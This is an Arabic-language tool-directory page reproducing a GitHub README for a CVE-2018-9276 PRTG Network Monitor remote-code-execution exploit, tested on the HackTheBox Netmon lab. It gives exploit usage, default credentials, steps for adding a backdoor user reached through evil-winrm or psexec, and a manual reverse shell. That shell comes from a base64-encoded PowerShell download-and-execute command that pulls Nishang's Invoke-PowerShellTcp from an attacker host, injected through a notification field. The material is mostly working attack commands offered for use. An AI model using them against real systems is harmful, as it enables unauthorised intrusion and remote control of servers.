Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-9276 — CVE-2018-9276 PRTG < 18.2.39 شل عكسي (دعم Python3) | Kitploit
أدوات/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
توليد الحمولةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 شل عكسي (دعم Python3)

عرض المستودع
2منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 شل عكسي (دعم Python3)

التبعيات

  • Impacket (إصدار Python3)
  • Netcat
  • Msfvenom

الاستخدام

root@kitploit:~
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. بيانات الاعتماد مطلوبة لتنفيذ الاستغلال. جرب بيانات الاعتماد الافتراضية prtgadmin:prtgadmin. وقد يكون من المفيد التحقق من قاعدة البيانات أو السجل للحصول عليها. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. جرب --lport 445 إذا لم يكن المنفذ مشغولاً.
  3. هناك بعض التعليقات الملتوية في الكود. قد تحتاج إلى بعض التعديلات.
  4. قد يتطلب الأمر عدة محاولات للنجاح. إعادة تشغيل الجهاز المستهدف هو دائمًا خيار جيد، خاصةً عندما يتسبب الحمولة (payload) في بعض التأثير.

تغطية الاختبار

صندوق HTB Netmon

root@kitploit:~
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

الشكر

شكر كبير لإصدار wildkindcc للبايثون 2 https://github.com/wildkindcc/CVE-2018-9276

توسيع المعرفة

استخدام metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

تنفيذ الأوامر عن بُعد

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

مثال الاستخدام

بيانات الاعتماد مطلوبة لتنفيذ الاستغلال. أولاً، سجل الدخول واحصل على ملف تعريف الارتباط (cookie) المُوثّق لإضافة مستخدم جديد.

root@kitploit:~
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// تسجيل الدخول كمستخدم جديد عبر evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// أو بديلاً باستخدام psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Screen Shot 2021-07-29 at 3 14 10 PM

استغلال متقدم يدويًا بدون إضافة مستخدم جديد

الفضل يعود للكتابة الرسمية لـ HTB
POC: https://www.codewatch.org/blog/?p=453 بالإضافة إلى استخدام SMB للحصول على شل عكسي https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

في حال لم نرغب في إضافة مستخدم، ولأجل تحسين OPSEC، يمكننا الحصول على شل عكسي. ولكن نظرًا لترميز HTML، يتم ترميز العديد من الأحرف. يمكننا تجاوز ذلك باستخدام تنفيذ PowerShell بتشفير base64. نحتاج إلى إنشاء أمر مشفر بـ base64. ومع ذلك، يجب أن يكون بالترميز الذي يستخدمه Windows، أي UTF-16LE.

root@kitploit:~
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

نستخدم iconv لتحويله إلى الترميز المستهدف وسنقوم بتنفيذ هذا الشل العكسي من Nishang. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

قم بتنزيل السكريبت واستخدم echo لإضافة الأمر إلى السطر الأخير.

root@kitploit:~
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

الآن، ابدأ تشغيل خادم HTTP بسيط وأنشئ إشعارًا جديدًا.

root@kitploit:~
python3 -m http.server 80

انقر فوق Setup > Account Settings > Notifications -> ثم انقر على "Add new notification" في أقصى اليمين. قم بتفعيل الإشعار بالنقر على زر الجرس (Bell).

root@kitploit:~
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Screen Shot 2021-07-29 at 4 08 01 PM

تنزيل الأداة